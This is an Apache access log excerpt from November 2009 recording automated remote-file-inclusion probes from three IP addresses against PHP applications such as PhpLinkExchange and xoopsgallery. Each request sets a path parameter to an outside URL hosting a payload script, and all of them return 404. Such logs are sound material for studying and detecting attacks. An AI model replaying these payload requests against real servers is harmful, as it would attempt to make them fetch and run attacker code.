66.163.197.88 - - [12/Nov/2009:03:14:22 -0600] "GET /logs/access_log.1250035200//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:03:14:24 -0600] "GET /logs/access_log.1253232000//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:15:30 -0600] "GET /logs/access_log.1250294400/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
222.236.47.182 - - [12/Nov/2009:03:16:15 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.236.47.182 - - [12/Nov/2009:03:16:15 -0600] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
222.236.47.182 - - [12/Nov/2009:03:16:15 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
